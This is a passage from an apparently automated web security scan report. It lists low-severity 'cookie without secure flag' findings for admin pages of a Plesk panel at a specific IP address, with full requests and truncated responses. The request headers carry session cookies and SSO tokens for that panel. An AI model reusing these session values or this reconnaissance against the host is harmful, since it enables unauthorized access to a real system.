rulelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6OTk5OTk5fQ%3D%3D; sessionID=zbwabgmusbzyeqroeknpnlxw; SSOSID=eJyrViouzo9PSU1LLM0pUbJSKqsssSg3rTCzzCotKUktKc4psMxLrzQpLE%2FJSzTOKi4ryypRqgUAGGIUIQ%3D%3D; BarExpanded=True; PLESKSESSID=d1d89b662c5412350defeb3cf7a23a17; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:08:07 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 10003

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.39. https://50.22.21.242:8443/admin/index.php/subscription/list  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/index.php/subscription/list

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/index.php/subscription/list HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/admin/subscription/list?context=subscriptions
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; form-nal-aps-catalog-search-show=false; rulelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6OTk5OTk5fQ%3D%3D; sessionID=zbwabgmusbzyeqroeknpnlxw; SSOSID=eJyrViouzo9PSU1LLM0pUbJSKqsssSg3rTCzzCotKUktKc4psMxLrzQpLE%2FJSzTOKi4ryypRqgUAGGIUIQ%3D%3D; BarExpanded=True; PLESKSESSID=d1d89b662c5412350defeb3cf7a23a17; psaContext=subscriptions

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:07:11 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 10007

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.40. https://50.22.21.242:8443/admin/promotion/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/promotion/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/promotion/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; psaContext=tools; sessionID=onthshevccsqtbfldgbmakbv

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 13:50:58 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=subscriptions; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 13:50:58 GMT
Connection: close
Content-Length: 9782

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.41. https://50.22.21.242:8443/admin/promotion/mobile-monitor/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/promotion/mobile-monitor/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/promotion/mobile-monitor/ HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/smb/admin-home
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:54:35 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 01:54:35 GMT
Content-Length: 16273

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...

4.42. https://50.22.21.242:8443/admin/reseller/create  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/reseller/create

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/reseller/create HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/admin/reseller/list?context=resellers
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=resellers

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 23:37:13 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=resellers; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 23:37:13 GMT
Content-Length: 38151

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.43. https://50.22.21.242:8443/admin/reseller/list  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/reseller/list

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/reseller/list?context=resellers HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/left.php3
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=resellers

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 23:37:04 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=resellers; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 23:37:04 GMT
Content-Length: 14509

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.44. https://50.22.21.242:8443/admin/reseller/list/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/reseller/list/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/reseller/list/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; sessionID=ouhymmzgtdaqakoglnanbrbl; form-nal-aps-catalog-search-show=false; rulelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6OTk5OTk5fQ%3D%3D; PLESKSESSID=b7d5dd4b3a9bb447376c29193bcc7fd3; psaContext=home

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 06:49:24 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=resellers; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 06:49:24 GMT
Connection: close
Content-Length: 14513

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.45. https://50.22.21.242:8443/admin/reseller/list/reset-search/true/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/reseller/list/reset-search/true/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/reseller/list/reset-search/true/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/admin/home/admin
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; sessionID=ouhymmzgtdaqakoglnanbrbl; form-nal-aps-catalog-search-show=false; rulelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6OTk5OTk5fQ%3D%3D; PLESKSESSID=b7d5dd4b3a9bb447376c29193bcc7fd3; psaContext=home

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 06:49:25 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=resellers; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 06:49:25 GMT
Connection: close
Content-Length: 14849

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.46. https://50.22.21.242:8443/admin/reseller/login-info/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/reseller/login-info/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/reseller/login-info/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; form-nal-aps-catalog-search-show=false; rulelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6OTk5OTk5fQ%3D%3D; sessionID=zbwabgmusbzyeqroeknpnlxw; SSOSID=eJyrViouzo9PSU1LLM0pUbJSKqsssSg3rTCzzCotKUktKc4psMxLrzQpLE%2FJSzTOKi4ryypRqgUAGGIUIQ%3D%3D; PLESKSESSID=d1d89b662c5412350defeb3cf7a23a17; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:02:48 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 10010

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.47. https://50.22.21.242:8443/admin/reseller/personal-info/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/reseller/personal-info/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/reseller/personal-info/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; form-nal-aps-catalog-search-show=false; rulelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6OTk5OTk5fQ%3D%3D; sessionID=zbwabgmusbzyeqroeknpnlxw; SSOSID=eJyrViouzo9PSU1LLM0pUbJSKqsssSg3rTCzzCotKUktKc4psMxLrzQpLE%2FJSzTOKi4ryypRqgUAGGIUIQ%3D%3D; PLESKSESSID=d1d89b662c5412350defeb3cf7a23a17; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:02:48 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 10013

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.48. https://50.22.21.242:8443/admin/reseller/tools/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/reseller/tools/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/reseller/tools/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; form-nal-aps-catalog-search-show=false; rulelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6OTk5OTk5fQ%3D%3D; sessionID=zbwabgmusbzyeqroeknpnlxw; SSOSID=eJyrViouzo9PSU1LLM0pUbJSKqsssSg3rTCzzCotKUktKc4psMxLrzQpLE%2FJSzTOKi4ryypRqgUAGGIUIQ%3D%3D; PLESKSESSID=d1d89b662c5412350defeb3cf7a23a17; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:02:47 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 10005

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.49. https://50.22.21.242:8443/admin/reseller/tools/id/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/reseller/tools/id/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/reseller/tools/id/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
